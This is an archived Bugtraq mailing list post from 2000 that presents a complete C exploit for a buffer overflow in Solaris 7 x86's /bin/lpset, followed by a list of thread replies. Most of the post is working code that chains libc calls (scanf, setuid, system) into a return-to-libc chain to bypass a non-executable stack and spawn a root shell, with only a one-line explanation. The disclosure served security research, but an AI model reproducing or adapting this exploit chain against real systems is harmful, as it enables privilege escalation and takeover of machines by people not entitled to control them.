Bugtraq mailing list archives
non-exec stack
From: newsham () LAVA NET (Tim Newsham)
Date: Sat, 6 May 2000 17:06:28 -1000
Here's an overflow exploit that works on a non-exec stack on x86 boxes. It demonstrates how it is possible to thread together several libc calls. I have not seen any other exploits for x86 that have done this.. for the lpset bug in sol7 x86. Tim N. #define BASE 0xdff40000 #define STACK 0x8047e30 #define BUFSIZE 36 #define SYSTEM (BASE + 0x5b328) #define SCANF (BASE + 0x5ae80) #define SETUID (BASE + 0x30873) #define PERCD (BASE + 0x83754) #define BINSH (BASE + 0x83654) #define POP3 (SYSTEM + 610) #define POP2 (SYSTEM + 611) #define POP1 (SYSTEM + 612) int main() { unsigned char expbuf[1024]; char *env[1]; int *p, i; memset(expbuf, 'a', BUFSIZE); p = (int *)(expbuf + BUFSIZE); *p++ = STACK; *p++ = SCANF + 1; *p++ = STACK + 6 * 4; *p++ = POP2; *p++ = PERCD; *p++ = STACK + 9 * 4; *p++ = STACK + 10 * 4; *p++ = SETUID; *p++ = POP1; *p++ = 0x33333333; *p++ = STACK + 15 * 4; *p++ = SYSTEM; *p++ = 0x33333333; *p++ = BINSH; *p = 0; env[0] = 0; execle("/bin/lpset", "/bin/lpset", "-n", "fns", "-r", expbuf, "123", 0, env); return 0; }
Current thread:
- non-exec stack Tim Newsham (May 06)
- "I don't think I really love you" Michal Zalewski (May 07)
- Re: non-exec stack Casper Dik (May 08)
- Re: non-exec stack Gert Doering (May 09)
- Re: non-exec stack Casper Dik (May 09)
- Re: non-exec stack Nate Eldredge (May 10)
- »Ø¸´: Re: non-exec stac ZhaoQian (May 10)
- Alert: IIS ism.dll exposes file contents Cerberus Security Team (May 11)
- ISSalert: Internet Security Systems Security Advisory: Microsoft IIS Remote Denial of Service Attack Warren Barrow (May 11)
- Remote DoS attack in Internet Information Server 4.0 & 5.0 "Malformed Extension Data in URL" Vulnerability Ussr Labs (May 11)
- Microsoft Security Bulletin (MS00-030) Microsoft Product Security (May 11)
- Re: non-exec stack Gert Doering (May 09)
(Thread continues...)